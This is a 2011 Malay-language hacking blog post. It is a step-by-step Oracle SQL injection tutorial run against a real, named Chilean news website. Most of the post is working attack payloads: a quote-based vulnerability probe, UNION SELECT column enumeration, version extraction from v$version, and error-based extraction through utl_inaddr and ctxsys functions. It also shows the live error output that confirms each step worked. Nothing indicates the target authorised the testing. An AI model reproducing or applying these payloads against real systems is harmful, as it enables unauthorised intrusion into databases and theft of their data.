Monday, May 30, 2011

Oracle Database Injection


So we gonna play with Oracle Database Injection
our target :
http://www3.inn.cl
First using Union Based injection

1 - Kita mulakan check vuln dgn letak single quote '
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
jika ade vuln,ia akan keluarkan error :
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
Kita dapat lihat ORA-01756,dan dgn segera tahulah ini oracle injection kn?


2 - Kita cari bilangan column mcm biasa. order by 1-- sampai error
dan dari web ni,column yg ade = 9
3 - so kita teruskan dgn union injection kita
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
jika di sini tiada nombor column yg error  kluar..So kita lihat error dia.
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6

FROM keyword not found,bermaksud injection ni kita perlukan FROM. 
Utk rujukan :
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/

Sebelum tu,kita perlukan null kan dulu semua nombor column sama mcm dlm posgresql injection.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null--

Dan utk mudahkan kita nk tau column mane bleh diinjek,tukarkan null kepada 0 satu demi satu.
dalam kes ni,column null pertama lepas letak 0 takde error,tp error wujud kalau pada column ke 2.
ini bermaksud,column kedua tu kita leh inject


4 - dlm tutorial nih kita just inject and extrac sampai version() je yer,yg lain2 korang test sdri GayFace
dari pentestmonkey,kita tgk ade 3 syntax utk cek version
Quote:SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;


so kita just amik yg 1st sbg testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:Oracle Database 10g Release 10.2.0.1.0 - 64bit Production
Image has been scaled down 22% (800x429). Click this bar to view original image (1022x547). Click image to open in new window.




So..dah berjaya... Smile
----------------------------------------------------------------------------------------------------------
 Kalau Error Base..kita biasa guna or 1=1 /or 1=2
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
function utl_inaddr.get_host_address hanya boleh digunakan kalau
oracle itu adalah version 10g ke bawah..kalau yg 11g kita perlu gunakan

Code:
1=ctxsys.drithsx.sn(1,(sql syntax))


Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6
[Image: 41004395321842115849.png]


Credit to : p0pc0rn @tbd.my 


1 comments:

Anonymous said...

bagus sekali tutorialnya mas..

F3bby

Post a Comment